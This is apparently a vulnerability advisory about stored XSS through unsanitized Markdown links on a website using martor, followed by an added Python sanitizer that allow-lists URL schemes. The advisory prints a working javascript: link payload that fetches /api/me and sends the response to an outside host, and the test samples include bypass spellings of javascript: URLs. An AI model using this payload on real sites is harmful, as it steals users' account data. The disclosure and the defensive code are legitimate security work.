Unsanitized Markdown (martor, using safe_markdown) was shown in the website, which allows XSS using the javascript: URL scheme.
For example:
[totally not xss](javascript:fetch(%27%2Fapi%2Fme%27).then(async%20(res)%3D%3Ewindow.location%20%3D%20%27https%3A%2F%2Fnyiyui.ca%2Ftotallynotxss%2F%27%20%2B%20encodeURIComponent(JSON.stringify(await%20res.json())))%3B)
/api/me and some other endpoints require OAuth, which makes them harder to use, but this vulnerability existed before OAuth was even implemented (#104), so it might've been exploited.
Fixed in production 2021-12-20T23:40:00±00:10:00.
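The durable fix for this class of bug is an allow-list of URL schemes applied to the rendered HTML, rather than a deny-list that looks for the literal string javascript:. The following is an added example, not martor's code and not the fix this project shipped; it assumes the Markdown has already been rendered to an HTML fragment, uses only the Python standard library, and the names ALLOWED_SCHEMES, is_safe_url and scrub_unsafe_links (and the choice to also cover img src and form action) are this example's own. It normalizes the URL the way a browser does before deciding (leading control characters and embedded tabs/newlines are dropped), so spellings like " javascript:" or "java&#9;script:" are classified the same way a browser would treat them.

```python
"""Post-render URL scheme allow-list for HTML produced by a Markdown renderer.

Added example; not martor's code and not this project's actual fix. It
assumes the Markdown has already been rendered to an HTML fragment and
applies an allow-list of URL schemes to link/image attributes, so that
"javascript:" (in any spelling a browser would still accept) never survives.
"""
import html
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlsplit

# Allow-list, not deny-list: anything not listed (javascript:, data:, vbscript:, ...) is dropped.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers strip leading/trailing C0 controls and spaces from a URL and delete
# tab/newline anywhere before parsing; normalize the same way so "java\tscript:"
# or " javascript:" is classified as the browser would see it.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def _browser_normalize(url: str) -> str:
    url = url.strip(_C0_AND_SPACE)
    return url.replace("\t", "").replace("\n", "").replace("\r", "")


def is_safe_url(url: str) -> bool:
    """True if the URL is relative (no scheme) or uses an allow-listed scheme."""
    scheme = urlsplit(_browser_normalize(url)).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class _LinkScrubber(HTMLParser):
    """Re-emits an HTML fragment, dropping URL attributes that fail is_safe_url."""

    # (tag, attribute) pairs whose value is a URL; extend as the renderer's output requires.
    URL_ATTRS = {("a", "href"), ("img", "src"), ("form", "action")}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.dropped: List[Tuple[str, str, str]] = []

    def _attrs(self, tag, attrs) -> str:
        parts = []
        for name, value in attrs:  # HTMLParser has already decoded entities in attribute values
            if (tag, name) in self.URL_ATTRS and value is not None and not is_safe_url(value):
                self.dropped.append((tag, name, value))
                continue
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        return (" " + " ".join(parts)) if parts else ""

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(tag, attrs)} />")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text arrives entity-decoded; re-escape it so the fragment stays well-formed.
        self.out.append(html.escape(data, quote=False))


def scrub_unsafe_links(fragment: str) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Return (cleaned_html, dropped_attributes).

    `dropped_attributes` is worth logging: a user-submitted document whose links
    get stripped here is a direct signal that someone tried this bug.
    """
    p = _LinkScrubber()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.dropped


if __name__ == "__main__":
    # Constructed sample in the same shape as the report's payload, plus bypass spellings.
    sample = (
        '<p><a href="javascript:fetch(\'/api/me\')">totally not xss</a> '
        '<a href="JaVaScRiPt:alert(1)">x</a> <a href="java&#9;script:alert(1)">y</a> '
        '<a href="https://example.com/?a=1&amp;b=2">ok</a> <a href="/api/me">rel</a></p>'
    )
    cleaned, dropped = scrub_unsafe_links(sample)
    print(cleaned)
    for tag, attr, value in dropped:
        print(f"dropped {tag}[{attr}] = {value!r}")
```

Run it on the rendered output of the Markdown renderer (the HTML that would otherwise be stored or served), not on the Markdown source: the renderer is what turns the link syntax into an href, and other syntaxes (reference-style links, raw HTML passed through) reach the same attribute. Relative URLs such as /api/me are kept because they have no scheme, which matches how the browser resolves them.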